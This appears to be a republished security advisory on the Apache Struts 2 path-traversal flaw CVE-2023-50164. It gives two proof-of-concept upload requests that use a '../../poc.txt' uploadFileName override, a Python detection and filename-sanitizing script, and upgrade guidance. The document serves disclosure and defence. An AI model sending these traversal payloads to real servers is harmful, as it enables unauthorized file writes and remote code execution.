Vulnerability description:
Apache Struts 2 is an open source web application framework for developing Java EE web applications. It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Apache has issued a security advisory for a serious flaw in the Struts 2 open source web application framework that can lead to remote code execution. The vulnerability, CVE-2023-50164, is rooted in defective file upload logic: it can allow unauthorized path traversal, and when exploited lets an attacker upload a malicious file and achieve arbitrary code execution.
Affected versions:
2.5.0 <= Struts <= 2.5.32
6.0.0 <= Struts <= 6.3.0
Proof of concept:
PoC 1 (multipart body only; the override parameter is sent as a second form field):
------WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="Upload"; filename="poc.txt"
Content-Type: text/plain
test
------WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="uploadFileName";
../../poc.txt
------WebKitFormBoundary5WJ61X4PRwyYKlip--
PoC 2 (full request; the override parameter is sent in the query string):
POST /s2_066_war_exploded/upload.action?uploadFileName=../../poc.txt HTTP/1.1
Host: localhost:8080
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5WJ61X4PRwyYKlip
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Length: 593
------WebKitFormBoundary5WJ61X4PRwyYKlip
Content-Disposition: form-data; name="Upload"; filename="poc.txt"
Content-Type: text/plain
test
------WebKitFormBoundary5WJ61X4PRwyYKlip--
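Both PoCs carry the same indicator: a parameter whose name is (case-insensitively) uploadFileName holding a "../" path, delivered either in the query string or as an extra multipart field. The script below is an added example written for this page, not code from the advisory or from the Apache Struts project. It parses a constructed request of the same shape as the PoCs, flags filename-style parameters that contain a ".." segment (a detection heuristic chosen here, not a rule taken from the vendor), and shows the generic mitigation of reducing a client-supplied name to a bare basename before it is used on disk. The request text is constructed, not captured traffic.

```python
import re
import ntpath
import posixpath
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request modelled on the two PoCs above (query-string
# override plus a second multipart field). Not captured traffic.
BOUNDARY = "----WebKitFormBoundary5WJ61X4PRwyYKlip"
SAMPLE_REQUEST = (
    "POST /upload.action?uploadFileName=../../poc.txt HTTP/1.1\r\n"
    "Host: localhost:8080\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="Upload"; filename="poc.txt"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    "test\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="uploadFileName"\r\n'
    "\r\n"
    "../../poc.txt\r\n"
    f"--{BOUNDARY}--\r\n"
)

# Constructed benign upload for comparison.
BENIGN_REQUEST = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: localhost:8080\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload"; filename="report.txt"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    "hello\r\n"
    f"--{BOUNDARY}--\r\n"
)

# A ".." that is a whole path segment, with either separator style.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.(?:[\\/]|$)")
DISPOSITION_NAME = re.compile(r'name="([^"]*)"')
DISPOSITION_FILENAME = re.compile(r'filename="([^"]*)"')


def split_request(raw):
    """Return (request-target, lowercase header dict, body) of a raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    target = request_line.split(" ")[1]
    return target, headers, body


def multipart_fields(body, content_type):
    """Yield (name, value) for every multipart part; file parts also yield
    ('filename', <filename attribute>) so the attribute is inspected too."""
    match = re.search(r"boundary=([^;]+)", content_type)
    if not match:
        return []
    delimiter = "--" + match.group(1).strip()
    fields = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith("--"):
            break  # closing delimiter reached
        part_head, _, part_body = chunk.lstrip("\r\n").partition("\r\n\r\n")
        name = DISPOSITION_NAME.search(part_head)
        if name:
            fields.append((name.group(1), part_body.rstrip("\r\n")))
        fname = DISPOSITION_FILENAME.search(part_head)
        if fname:
            fields.append(("filename", fname.group(1)))
    return fields


def upload_traversal_findings(raw):
    """Return [(param_name, value)] for filename-style parameters, from the
    query string or the multipart body, whose value contains a '..' segment."""
    target, headers, body = split_request(raw)
    candidates = list(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    candidates += multipart_fields(body, headers.get("content-type", ""))
    return [(name, value) for name, value in candidates
            if name.lower().endswith("filename") and TRAVERSAL.search(value)]


def safe_upload_name(client_name):
    """Mitigation: keep only the last path component (POSIX and Windows
    separators) and refuse names that collapse to nothing or to dot names."""
    base = ntpath.basename(posixpath.basename(client_name))
    if base in ("", ".", ".."):
        raise ValueError("unusable upload file name: %r" % client_name)
    return base


if __name__ == "__main__":
    print("findings:", upload_traversal_findings(SAMPLE_REQUEST))
    print("benign:", upload_traversal_findings(BENIGN_REQUEST))
    print("sanitized:", safe_upload_name("../../poc.txt"))
```

In a WAF rule or log pipeline the same two checks apply: inspect every parameter source (query string and multipart fields, with case-insensitive name matching) for traversal segments, and on the application side never let a client-controlled name carry directory components at all; upgrading to the fixed versions listed below remains the actual remediation.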
Fix:
Official fixed versions are available. Users are advised to upgrade to a safe version as soon as possible:
Struts >= 2.5.33
Struts >= 6.3.0.2
Patch: https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7
References:
https://cwiki.apache.org/confluence/display/WW/S2-066
https://github.com/apache/struts/compare/STRUTS_6_3_0...STRUTS_6_3_0_2#files_bucket
https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7
https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-(-S2-066-CVE-2023-50164)
https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-File upload analysis-S2-066/
Original article by Chief Security Officer, if reproduced, please credit https://cncso.com/en/new-critical-rce-vulnerability-discovered-in-apache-struts2-html